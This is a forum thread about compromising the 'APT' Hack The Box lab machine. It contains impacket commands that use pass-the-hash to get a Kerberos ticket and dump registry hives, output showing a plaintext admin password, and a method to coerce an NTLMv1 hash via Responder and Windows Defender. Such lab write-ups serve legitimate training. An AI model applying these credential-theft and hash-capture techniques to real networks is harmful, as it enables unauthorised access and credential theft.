TUTORIAL apt.htb
by ARhOmOuTEd - November 02, 2020 at 04:46 PM
#49
(December 29, 2020 at 10:41 AM)runos Wrote:
(December 02, 2020 at 12:39 AM)joker0x90 Wrote: Assuming apt6.htb is your ipv6 IP of the box

Get a kerberos ticket


getTGT.py HTB.local/[email protected] -hashes e53d87d42adaa3ca32bdb34a876cbffb:e53d87d42adaa3ca32bdb34a876cbffb

export [email protected]


Query the registry using impacket

reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
Along the output you find


\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ  henry.vinson_adm
        PassWord        REG_SZ  G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\


User winrm to log in to APT

Nice, do you know how to priv esc on this machine?

Its about NTLMv1, like you can see in the consolehost_history.txt
Find a way to make a request with LocalSystem to your machine and catch the NTLMv1-Request. Then you can crack the NTLMv1.
#50
(December 29, 2020 at 11:43 AM)ARhOmOuTEd Wrote:
(December 29, 2020 at 10:41 AM)runos Wrote:
(December 02, 2020 at 12:39 AM)joker0x90 Wrote: Assuming apt6.htb is your ipv6 IP of the box

Get a kerberos ticket


getTGT.py HTB.local/[email protected] -hashes e53d87d42adaa3ca32bdb34a876cbffb:e53d87d42adaa3ca32bdb34a876cbffb

export [email protected]


Query the registry using impacket

reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
Along the output you find


\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ  henry.vinson_adm
        PassWord        REG_SZ  G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\


User winrm to log in to APT

Nice, do you know how to priv esc on this machine?

Its about NTLMv1, like you can see in the consolehost_history.txt
Find a way to make a request with LocalSystem to your machine and catch the NTLMv1-Request. Then you can crack the NTLMv1.

Is there any resources for this I can read on? I have never made a request to my machine as localsystem when being a low-priv user, so not sure about this
#51
(December 29, 2020 at 12:28 PM)runos Wrote:
(December 29, 2020 at 11:43 AM)ARhOmOuTEd Wrote:
(December 29, 2020 at 10:41 AM)runos Wrote:
(December 02, 2020 at 12:39 AM)joker0x90 Wrote: Assuming apt6.htb is your ipv6 IP of the box

Get a kerberos ticket


getTGT.py HTB.local/[email protected] -hashes e53d87d42adaa3ca32bdb34a876cbffb:e53d87d42adaa3ca32bdb34a876cbffb

export [email protected]


Query the registry using impacket

reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
Along the output you find


\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ  henry.vinson_adm
        PassWord        REG_SZ  G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\


User winrm to log in to APT

Nice, do you know how to priv esc on this machine?

Its about NTLMv1, like you can see in the consolehost_history.txt
Find a way to make a request with LocalSystem to your machine and catch the NTLMv1-Request. Then you can crack the NTLMv1.

Is there any resources for this I can read on? I have never made a request to my machine as localsystem when being a low-priv user, so not sure about this

I don't have any, but you can use the responder (https://tools.kali.org/sniffingspoofing/responder) on your machine and then use the windows defender on apt.htb to scan a file on your machine. Then it will try to connect to your machine and send the ntlmv1 hash. Next you have to crack the hash, because its not the normal ntlm hash, you can use for a pass-the-hash attack.
#52
(December 29, 2020 at 10:08 PM)ARhOmOuTEd Wrote:
(December 29, 2020 at 12:28 PM)runos Wrote:
(December 29, 2020 at 11:43 AM)ARhOmOuTEd Wrote:
(December 29, 2020 at 10:41 AM)runos Wrote:
(December 02, 2020 at 12:39 AM)joker0x90 Wrote: Assuming apt6.htb is your ipv6 IP of the box

Get a kerberos ticket


getTGT.py HTB.local/[email protected] -hashes e53d87d42adaa3ca32bdb34a876cbffb:e53d87d42adaa3ca32bdb34a876cbffb

export [email protected]


Query the registry using impacket

reg.py -k apt.htb.local query -keyName HKU -s >> regdump.txt
Along the output you find


\Network\
\Software\
\Software\GiganticHostingManagementSystem\
        UserName        REG_SZ  henry.vinson_adm
        PassWord        REG_SZ  G1#[email protected]
\Software\Microsoft\
\Software\Microsoft\Active Setup\
\Software\Microsoft\Active Setup\Installed Components\


User winrm to log in to APT

Nice, do you know how to priv esc on this machine?

Its about NTLMv1, like you can see in the consolehost_history.txt
Find a way to make a request with LocalSystem to your machine and catch the NTLMv1-Request. Then you can crack the NTLMv1.

Is there any resources for this I can read on? I have never made a request to my machine as localsystem when being a low-priv user, so not sure about this

I don't have any, but you can use the responder (https://tools.kali.org/sniffingspoofing/responder) on your machine and then use the windows defender on apt.htb to scan a file on your machine. Then it will try to connect to your machine and send the ntlmv1 hash. Next you have to crack the hash, because its not the normal ntlm hash, you can use for a pass-the-hash attack.

Rooted it now, thanks for you help. But this was unintended solution and there is another intended way to do it
#53
(December 29, 2020 at 11:03 PM)runos Wrote:
(December 29, 2020 at 10:08 PM)ARhOmOuTEd Wrote:
(December 29, 2020 at 12:28 PM)runos Wrote:
(December 29, 2020 at 11:43 AM)ARhOmOuTEd Wrote:
(December 29, 2020 at 10:41 AM)runos Wrote: Nice, do you know how to priv esc on this machine?

Its about NTLMv1, like you can see in the consolehost_history.txt
Find a way to make a request with LocalSystem to your machine and catch the NTLMv1-Request. Then you can crack the NTLMv1.

Is there any resources for this I can read on? I have never made a request to my machine as localsystem when being a low-priv user, so not sure about this

I don't have any, but you can use the responder (https://tools.kali.org/sniffingspoofing/responder) on your machine and then use the windows defender on apt.htb to scan a file on your machine. Then it will try to connect to your machine and send the ntlmv1 hash. Next you have to crack the hash, because its not the normal ntlm hash, you can use for a pass-the-hash attack.

Rooted it now, thanks for you help. But this was unintended solution and there is another intended way to do it

any hints , would be really helpful on priv esc .
#54
Bumping this to get some htb content on the front page. if anyone has a link to a write up, that would be frikken amazin.
#55
You fellas help us out with some hints on root part, I'm stuck at root.
#56
Trying to keep this on the front page instead of the course leaks which are taking over
#57
SSSSSSSSSSSSSSSSSOMEONE SHARE SOME HINTS ON ROOT
#58
Here are the steps I took to get root in APT. I used the idea posted in one of the threads about this machine, but I could not find it right now, so I cannot give credit. Sorry about that.

I have no idea if this is the intended way, but it was my way. =D


steps4root Hidden Content
You must register or login to view this content.
#59
(January 02, 2021 at 10:58 PM)CaptH00k Wrote: Here are the steps I took to get root in APT. I used the idea posted in one of the threads about this machine, but I could not find it right now, so I cannot give credit. Sorry about that.

I have no idea if this is the intended way, but it was my way. =D


[Hidden Content]

@CaptHOOk - I dont have enough enough credits, may you kindly share the steps with me
#60
(January 17, 2021 at 12:29 PM)davedk Wrote:
(January 02, 2021 at 10:58 PM)CaptH00k Wrote: Here are the steps I took to get root in APT. I used the idea posted in one of the threads about this machine, but I could not find it right now, so I cannot give credit. Sorry about that.

I have no idea if this is the intended way, but it was my way. =D


[Hidden Content]

@CaptHOOk - I dont have enough enough credits, may you kindly share the steps with me

you can get the credits needed to unlock this for free - just make 4 posts somewhere else on the forum

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB - APT - Full tutorial EddieFlagg 38 8,084 April 15, 2021 at 11:18 PM
Last Post: 0xbc000
TUTORIAL APT htb i need help asalam 0 169 April 08, 2021 at 01:16 PM
Last Post: asalam
TUTORIAL HTB - You have been banned by HTB-Bot HDplus 23 3,045 March 27, 2021 at 11:11 PM
Last Post: throwawayzero

 Users browsing this thread: 1 Guest(s)